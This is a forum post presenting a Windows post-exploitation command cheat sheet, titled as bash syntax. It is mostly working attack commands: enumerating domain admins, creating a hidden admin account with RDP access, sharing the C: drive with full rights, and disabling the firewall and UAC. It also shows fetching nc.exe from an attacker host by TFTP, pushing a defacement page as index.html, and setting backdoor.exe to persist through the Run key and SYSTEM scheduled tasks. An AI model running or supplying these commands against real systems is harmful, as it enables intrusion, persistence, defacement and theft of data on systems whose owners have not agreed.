[Win+Linux]Useful Bash Command Line syntax

Welcome Guest! To enable all features please try to register or login.

Dr-Hack		#1 Posted : Friday, September 27, 2013 6:48:41 PM(UTC) Retweet
Rank: Administrator Reputation: Medals: Joined: 1/15/2005(UTC) Posts: 1,318 Thanks: 22 times Was thanked: 73 time(s) in 57 post(s)		A List of useful command line syntax which can be used on servers to find various important information -------------------------- View Computers, Workgroups & Domains: -------------------------- NET VIEW NET VIEW /DOMAIN List Domain Controllers: Win2K: NETDOM QUERY /D:MyDomain DC Find Primary DC: NETDOM QUERY /D:MyDomain PDC Win2k3: DSQUERY Server Find primary DC: NETDOM QUERY /D:mydomain.com FSMO ---------------------- Check users logged on: ---------------------- NET SESSION \| FIND "\\" WMIC /Node:remotecomputer ComputerSystem Get UserName Using REG.EXE: Windows 2000\|XP\|2k3): FOR /F %%A IN ('REG Query \\remotecomputer\HKU ˆ\| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]$"' DO (FOR /F "tokens=3 delims=\" %%B IN ('REG Query "\\remotecomputer\%%A\Volatile Environment"' DO (SET LoggedinUser=%%B)) Windows 7: FOR /F %%A IN ('REG Query \\remotecomputer\HKU /K /F "S-1-5-21-" ˆ\| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]$"' DO (' DO (FOR /F "tokens=2" %%B IN ('REG Query "\\remotecomputer\%%~A\Volatile Environment" /V "UserName" ˆ\| FIND /V ":"' DO (SET LoggedinUser=%%C)) ---------- SYSTEMINFO: ---------- systeminfo net config workstation tasklist taskkill [/f] /pid <pid> taskkill [/f] /im <image_name> qprocess -------------- schedule tasks: -------------- echo %time% at at <time+1min> /INTERACTIVE "cmd.exe" pops a SYSTEM level shell if not disabled, scheduled tasks can also be used... schtasks ---------- LIST USERS: ---------- whoami /all net use net localgroup net localgroup <GROUP-NAME> NET LOCALGROUP Administrators net localgroup administrators /domain net group “Domain Admins” /domain net group “Enterprise Admins” /domain net group “Domain Controllers” /domain net group “Remote Desktop Users" password policy info: net accounts net accounts /domain ---------------------------------- Find out Group Membership for user: ---------------------------------- DSQUERY USER -samid <loginname> \| DSGET USER -memberof -expand ------------------------------------ Check Directory Permissions for User: ------------------------------------ CD /D d:\directory2check SHOWACLS /Uomain\userid ------------ List Drives: ------------ fsutil fsinfo drives ------------ List Shares: ------------ net share --------------- Reset User Pass: --------------- NET USER <loginname> <newpassword> /DOMAIN on Srv2k3: DSQUERY USER -samid <loginname> \| DSMOD USER -pwd <newpassword> Now make sure password never expires: WMIC.EXE /Node:remotecomputer Path Win32_UserAccount Where Name="user" Set PasswordExpires="FALSE" ------------------------- ADD USER + RDP ENABLEMENT: ------------------------- net user <USER-NAME> <PASS> /add net localgroup administrators <USER-NAME> /add net localgroup “Remote Desktop Users” <USER-NAME> /add net share nothing$=C:\ /grant:<USER-NAME>,FULL /unlimited shares C drive and grans unlimited access to it for our new admin user.... If the server is a member of a domain, we can go a step further and add a domain level user rather than a local one. This will have more reach within the organisation that a local user will, but it will also be much more visible to the IT team of the organisation that you're testing. Simply add "/DOMAIN" after first command above to add to domain level in addition to local level re-enable a disabled account (perhaps an old admin account ): net user username /active:yes /domain ------------------------------------------------------------------------------- Tunnel RDP out on another port besides default port 3389, port 443 in this case: ------------------------------------------------------------------------------- REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f simple change back to 3389 to return to default port. If you need to check if port is already in use or not you can use a quick "netstat -an \| find <port#>" May need a restart or RDP Service restart to take affect -------------- Firewall Info: -------------- If you want to find out geenral info about the firewall, use this: netsh firewall show opmode See list of port openings: netsh firewall show portopening Add port opening in firewall, for port 455 for any service or program to use: netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL Turn off built-in Windows firewall: netsh firewall set opmode disable or SC [ \\Remote_computer ] Stop SharedAccess SC [ \\Remote_computer ] Config SharedAccess start= disabled --------------------- NetCat File Transfers: --------------------- Push a file from client to listener: ncat –lv [LocalPort] > [outfile] Listen on [LocalPort], store results in [outfile] $ nc –w3 [TargetIPaddr] [port] < [infile] Push [infile] to [TargetIPaddr] on [port] Pull file from listener back to client: $ nc –l -p [LocalPort] < [infile] Listen on [LocalPort], prep to push [infile] $ nc –w3 [TargetIPaddr] [port] > [outfile] Connect to [TargetIPaddr] on [port] and retrieve [outfile] -------------------- TFTP File Transfers: -------------------- If it is not enabled, follow these 4 quick steps: 1 => copy %windir%\system32\dllcache\tftpd.exe %windir%\system32 2 => sc create tftpdsvc binPath= C:\Windows\System32\tftpd.exe DisplayName= "TFTP Server" start= auto Should see: "[SC] CreateService SUCCESS" 3 => REG ADD HKLM\SYSTEM\CurrentControlSet\Services\tftpdsvc\Parameters /v Directory /t REG_SZ /d "C:\Documents and Settings\Administrator\Desktop\tftp" 4 => net start tftpdsvc tftp [-i] [Host] [{get \| put}] [Source] [Destination] -i: Specifies binary image transfer mode (also called octet mode). In binary image mode, the file is transferred in one-byte units. Use this mode when transferring binary files. If -i is omitted, the file is transferred in ASCII mode. This is the default transfer mode. This mode converts the end-of-line (EOL) characters to an appropriate format for the specified computer. Use this mode when transferring text files. If a file transfer is successful, the data transfer rate is displayed. Host: Specifies the local or remote computer. put: Transfers the file Destination on the local computer to the file Source on the remote computer. Because the TFTP protocol does not support user authentication, the user must be logged onto the remote computer, and the files must be writable on the remote computer. get: Transfers the file Destination on the remote computer to the file Source on the local computer. Source: Specifies the file to transfer. Destination: Specifies where to transfer the file. If Destination is omitted, it is assumed to have the same name as Source. /?: Displays help at the command prompt. EXAMPLES (ATTACKER=.21 && TARGET=.30): tftp 192.168.1.30 GET /home/hood3drob1n/defaced.html index.html This will transfer the local file "defaced.html" from local to remote server and will re-name the file as index.html on the remote server, which was identified as 192.168.1.30 tftp -i 192.168.1.21 GET /home/hood3drob1n/evil/nc.exe This will grab a copy of nc.exe from 192.168.1.21 tftp -i 192.168.1.30 PUT /home/hood3drob1n/evil/nc.exe /path/on/target/nc.exe This will copy local file nc.exe to the server at 192.168.1.30 If facing newer Windows Systems (Vista, 7, or Srv2008) you might need to disable CTCP protection to get working TFTP as CTCP has been known to cause issues with timeouts (not implemented in Linux or Windows XP) To disable enter this command: netsh interface tcp set global congestionprovider=none TFTP Not enabled due to being newer system? No problem, re-enable using DISM dism (Deployment Image Servicing and Management Technical) allows command line control of services, I do it via a DOS script, but this is the key: dism /online /Enable-Feature /FeatureName:TelnetClient dism /online /Enable-Feature /FeatureName:TFTP ----------------------- CMD FTP Remote Download: ----------------------- echo open <site.com> > ftpscript.txt (Optional, but if omitted the host/ip needs to be specified after script name in -s argument to identify target host properly) echo <USER> >> ftpscript.txt echo <PASS> >> ftpscript.txt echo binary >> ftpscript.txt (If next line points to a .exe use this line, otherwise not needed) echo get <FILE> >> ftpscript.txt echo quit >> ftpscript.txt ftp -s:ftpscript.txt ---------------------------- Set Backdoor w/Firewall hole: ---------------------------- 1) REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f 2) at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe" 3) SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012 -------------- Services Info: -------------- To delete a Windows Service, simply type use the Service Control, or "sc", command with delete argument followed by the Service name sc delete <ServiceName> Use quotes if spaces in name: sc delete “Apple Mobile Device” You can use SC to query for all configured services on the box with simple command: sc query or NET START All Services on windows can be found under this registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services Start/Pause/Stop/Continue a Service SC <ServerName> Start\|Pause\|Stop\|Continue <ServiceName> You can omit server name and assumes on localhost, but you can also leverage this to interact with other systems services if you have elevated privileges SC Stop Scheduler SC Start Messenger SC \\W2k3SRV Pause W3Svc SC \\192.168.1.10 Continue NTfrs ---------------------- Disable UAC in Vista+: ---------------------- %windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f Essentially we just set this registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EnableLUA=0 to disable and EnableLUA=1 to re-enable UAC ----------------- REGISTRY EDITING: ----------------- -------------------------------------------- Query for a specific Value of a Registry Key: -------------------------------------------- reg (QUERY, ADD, DELETE, COPY, SAVE, LOAD, UNLOAD, RESTORE, COMPARE, EXPORT, IMPORT (FLAGS)) KEY reg <option> [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] Check if RDP Enabled or not: C:\> reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" 0=Enabled 1=Disabled To re-enable RDP: REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 If remote registry access is available, you can try tweaking internal machines as well to further pivot: REG.exe ADD "\\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 The machine typially needs to be rebooted for the change to take effect, so open a command prompt and type the following command: shutdown -m \\srv220 -r ---------------------- Interface Device Info: ---------------------- ipconfig /all ipconfig /displaydns arp -a route print type %WINDIR%\System32\drivers\etc\hosts ------------------ Group Policy Info: ------------------ gpresult /z

		WWW

User Profile View All Posts by User View Thanks

Sponsor

Rss Feed

Atom Feed

Users browsing this topic
Guest

You cannot post new topics in this forum.
You cannot reply to topics in this forum.
You cannot delete your posts in this forum.
You cannot edit your posts in this forum.
You cannot create polls in this forum.
You cannot vote in polls in this forum.

Notification

Error